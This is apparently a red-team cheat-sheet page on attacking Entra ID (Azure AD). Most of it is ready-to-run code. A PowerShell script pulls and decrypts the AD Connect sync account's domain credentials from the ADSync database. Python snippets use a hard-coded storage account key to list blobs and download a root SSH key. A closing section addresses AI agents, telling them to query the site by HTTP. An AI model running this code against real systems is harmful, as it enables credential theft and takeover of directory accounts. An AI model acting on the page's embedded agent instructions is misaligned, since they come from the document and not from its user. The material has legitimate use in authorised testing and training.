# Entra ID (Azure AD) * If you are on `Azure Admins` group? ```bash ## ------------------| Read this blog https://blog.xpnsec.com/azuread-connect-for-redteam/ ## ------------------| Methodology $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync" $client.Open() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $key_id = $reader.GetInt32(0) $instance_id = $reader.GetGuid(1) $entropy = $reader.GetGuid(2) $reader.Close() $cmd = $client.CreateCommand() $cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'" $reader = $cmd.ExecuteReader() $reader.Read() | Out-Null $config = $reader.GetString(0) $crypted = $reader.GetString(1) $reader.Close() add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll' $km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager $km.LoadKeySet($entropy, $instance_id, $key_id) $key = $null $km.GetActiveCredentialKey([ref]$key) $key2 = $null $km.GetKey(1, [ref]$key2) $decrypted = $null $key2.DecryptBase64ToString($crypted, [ref]$decrypted) $domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}} $username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}} $password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}} Write-Host ("Domain: " + $domain.Domain) Write-Host ("Username: " + $username.Username) Write-Host ("Password: " + $password.Password) ``` * Azure Storage Development (Microsoft Azure Storage Explorer) ```bash pip install azure.storage.blob ## Copy the key file /var/backups/key from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient # Your connection string for the Azure Storage Emulator connect_str = 'DefaultEndpointsProtocol=http;AccountName=jennifer;AccountKey=FMinPqwWMtEmmPt2ZJGaU5MVXbKBtaFyqP0Zjohpoh39Bd5Q8vQUjztVfFphk73+I+HCUvNY23lUabd7Fm8zgQ==;BlobEndpoint=http://127.0.0.1:10000/jennifer;QueueEndpoint=http://127.0.0.1:10001/jennifer;TableEndpoint=http://127.0.0.1:10002/jennifer;' try: # Create the BlobServiceClient object which will be used to create a container client blob_service_client = BlobServiceClient.from_connection_string(connect_str, api_version='2020-06-12') # Listing containers and files in them for container in blob_service_client.list_containers(): print(container['name']) container_client = blob_service_client.get_container_client(container['name']) blob_list = container_client.list_blobs() for blob in blob_list: print("\t" + blob.name) except Exception as ex: print('Exception:') print(ex) from azure.storage.blob import BlobServiceClient, BlobClient, ContainerClient, __version__ connect_str = 'DefaultEndpointsProtocol=http;AccountName=jennifer;AccountKey=FMinPqwWMtEmmPt2ZJGaU5MVXbKBtaFyqP0Zjohpoh39Bd5Q8vQUjztVfFphk73+I+HCUvNY23lUabd7Fm8zgQ==;BlobEndpoint=http://127.0.0.1:10000/jennifer;QueueEndpoint=http://127.0.0.1:10001/jennifer;TableEndpoint=http://127.0.0.1:10002/jennifer;' try: blob_service_client = BlobServiceClient.from_connection_string(connect_str, api_version='2020-06-12') # Download the root key blob blob_client = blob_service_client.get_blob_client(container='ssh-keys', blob='root.key') with open('./root.key', "wb") as download_file: download_file.write(blob_client.download_blob().readall()) except Exception as ex: print('Exception:') print(ex) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.h4rithd.com/cloud/azure-ad.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.